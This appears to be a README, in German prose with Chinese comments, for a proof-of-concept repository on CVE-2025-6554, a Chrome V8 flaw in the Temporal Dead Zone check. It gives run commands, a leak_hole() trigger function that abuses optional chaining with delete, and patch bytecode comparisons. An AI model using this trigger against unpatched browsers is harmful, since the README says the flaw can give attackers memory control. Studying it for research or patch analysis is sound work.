
CVE-2025-6554 PoC
⚠️ Sicherheitsforschungsprojekt - Dieses Projekt dient ausschließlich der Sicherheitsforschung und zu Bildungszwecken. Bitte nicht in Produktionsumgebungen verwenden.
CVE-2025-6554 ist eine schwerwiegende Schwachstelle in der Chrome-V8-Engine, die den Prüfmechanismus der "Temporal Dead Zone" (TDZ) in JavaScript betrifft. Dieses Projekt stellt einen vollständigen Proof-of-Concept-Code sowie Demonstrationswerkzeuge für die Schwachstelle bereit.
Die Schwachstelle besteht darin, dass die V8-Engine bei der Verarbeitung des Optional-Chaining-Operators (?.) nicht korrekt prüft, ob eine Variable bereits initialisiert wurde, wodurch der Zugriff auf nicht deklarierte Variablen ermöglicht und der TDZ-Schutzmechanismus umgangen wird.
git clone https://github.com/9Insomnie/CVE-2025-6554.git
cd CVE-2025-6554
CVE-2025-6554/
├── Exploit.js # 原始漏洞利用代码
├── Test-Exploit.js # 测试版本
├── poc.html # 检测文件
├── README.md # 项目说明
└── 使用说明.md # 详细使用指南
# 使用V8的d8调试器运行
c:\path\to\v8\out\x64.debug\d8 --allow-natives-syntax --print-bytecode Exploit.js
# 运行测试版本
node Test-Exploit.js
# 或运行原始利用代码
node Exploit.js
Öffnen Sie die HTML-Datei direkt im Browser zum Testen (die entsprechenden Funktionen müssen unterstützt werden).
function leak_hole() {
let x;
delete x?.[y]?.a; // 使用未声明的变量y
return y; // 应该抛出ReferenceError
let y; // y在这里才声明
}
Vor dem Patch:
0x32600100133 @ 11 : b6 00 ThrowReferenceErrorIfHole [0]
Nach dem Patch:
0x29f00100133 @ 11 : b6 00 ThrowReferenceErrorIfHole [0]
0x29f00100144 @ 28 : b6 00 ThrowReferenceErrorIfHole [0] // 新增检查
delete x?.[y]?.a# 检查漏洞是否存在
node Test-Exploit.js
# 查看详细字节码
d8 --allow-natives-syntax --print-bytecode Exploit.js
Diese Schwachstelle wurde von Sicherheitsforschern entdeckt und betrifft den TDZ-Prüfmechanismus in der V8-Engine. Über den Optional-Chaining-Operator können Angreifer die Variableninitialisierungsprüfung umgehen und die Kontrolle über den Speicher erlangen.
Dieses Projekt ist unter der MIT-Lizenz lizenziert - Weitere Details finden Sie in der Datei LICENSE.
⚠️ Haftungsausschluss: Dieses Projekt dient ausschließlich der Sicherheitsforschung und zu Bildungszwecken. Die Nutzung erfolgt auf eigenes Risiko; die Autoren übernehmen keinerlei rechtliche Haftung.
🔒 Sicherheitsmeldung: Wenn Sie neue Sicherheitsprobleme entdecken, kontaktieren Sie uns bitte über GitHub Issues.